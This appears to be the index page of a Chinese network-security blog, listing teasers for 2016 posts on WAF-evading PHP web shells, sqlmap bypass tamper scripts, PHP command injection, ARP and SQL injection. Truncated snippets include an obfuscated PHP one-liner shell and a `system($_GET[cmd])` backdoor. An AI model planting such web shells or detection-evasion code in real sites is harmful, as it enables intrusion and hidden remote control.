蜗蜗侠's Blog-关注网络安全移动版

  • php过狗一句话

    日期:2016-11-27 15:55:15 点击:151 好评:0

    分享一个别的地方看到的 混淆过狗php一句话 ?php $mt=mFsKCleRfU; $ojj=IEBleldle; $hsa=E9TVFsnd2VuJ10p; $fnx=Ow==; $zk = str_replace(d,,sdtdrd_redpdldadcde); //字符串替换:替换sdtdrd_redpdldadcde里的d为空 返回str_replace $ef = $zk(z, , zbazsze...

  • ARP全攻略分享

    日期:2016-11-26 14:12:49 点击:164 好评:0

    前言 我们知道,当我们在浏览器里面输入网址时,DNS服务器会自动把它解析为IP地址,浏览器实际上查找的是IP地址而不是网址。那么IP地址是如何转换为第二层物理地址(即MAC地址)的呢?在局域网中,这是通过ARP协议来完成的。ARP协议对网络安全具有重要的意义...

  • Python WEB框架下集成乌云漏洞查询

    日期:2016-11-26 13:59:36 点击:167 好评:0

    做渗透的时候遇到一个系统可以到网上搜索下这个系统的相关漏洞,众所周知的原因,wooyun关闭了很久,所以我们最好自己搭建一个乌云镜像。 ...

  • 最优秀的Kali Linux渗透测试课程

    日期:2016-11-26 10:06:21 点击:108 好评:0

    0x00 前言 称为最优秀我个人觉得一点都不为过,目前市面上的那些课程先不说能不能把工具实现的原理讲清楚,就连工具的功能也是一知半解,更不说系统完整的渗透测试框架,yuanfh老师可能是我见过讲Kali Linux渗透测试最优秀的老师,很有幸学到老师的课程,老...

  • Base64 编码介绍、Base64编码转换原理、算法

    日期:2016-11-26 09:58:47 点击:133 好评:0

    Base64编码,是我们程序开发中经常使用到的编码方法。它是一种基于用64个可打印字符来表示二进制数据的表示方法。它通常用作存储、传输一些二进制数据编码方法!也是MIME(多用途互联网邮件扩展,主要用作电子邮件标准)中一种可打印字符表示二进制数据的常...

  • Sqlmap过狗过云锁注入脚本一枚

    日期:2016-11-25 10:28:52 点击:128 好评:0

    #!/usr/bin/env python[/color][/size] [size=3][color=lime] Copyright (c) 2006-2016 sqlmap developers ([/color][/size][url=http://sqlmap.org/][size=3][color=lime]http://sqlmap.org/[/color][/size][/url][size=3][color=lime]) See the file doc/C...

  • Sqlmap过360注入脚本一枚

    日期:2016-11-25 10:24:30 点击:148 好评:0

    #!/usr/bin/env python[/color][/size][/b] [b][size=3][color=#ff0000] Copyright (c) 2006-2016 sqlmap developers ([url=http://sqlmap.org/]http://sqlmap.org/[/url]) See the file doc/COPYING for copying permission [/color][/size][/b] [b][size=3...

  • 利用php进行命令注入攻击演练

    日期:2016-11-25 09:26:47 点击:90 好评:0

    本机搭建php环境我用的是phpstudy 软件下载地址: http://www.baidu.com 自己配置phpstudy 我就不废话了 网站根目录新建index.php名字随便啊index 我只是图一个方便而已~~! ?$cmd = $_GET[cmd];echo pre;system($cmd);echo /pre;? 代码写入然后本机访问网站...

  • OWASP TOP10的安全威胁SQL注射(SQL Injection)

    日期:2016-11-25 08:59:35 点击:165 好评:0

    非常感谢大家一直一来对于“深入学习web安全”系列文章的关注,但是我看到很多同学都说看着不过瘾啊!所以,咱们从这节课开始,就用视频来继续学习吧!...

  • PHP免杀shell的编写,附免杀shell

    日期:2016-11-24 20:48:26 点击:64 好评:0

    00x1 先上图: 0x2 编写过程 这里必须强调一下我内心的感觉,小阔爱前两天也研究了过狗的一句话了,然后我突然觉得大家都在进步,我研究点啥呢?不如也试试以前因为觉得自己不懂代码,而不会研究的免杀shell吧。 很多人都在说过狗的方法,大致总结一下就是:...